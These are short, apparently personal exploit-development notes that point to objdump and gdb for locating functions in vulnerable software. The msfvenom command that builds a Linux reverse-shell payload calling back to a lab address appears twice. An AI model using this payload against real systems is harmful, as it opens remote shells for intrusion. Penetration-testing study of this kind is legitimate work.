misc
To find location of any particular function in vulnerable software
- use objdump -d <vuln_sodtware>
- in linux , gdb ./<vuln_software>
Linux payload :- msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 -b "\x00\x20" -f py
To find location of any particular function in vulnerable software
Linux payload :- msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 -b "\x00\x20" -f py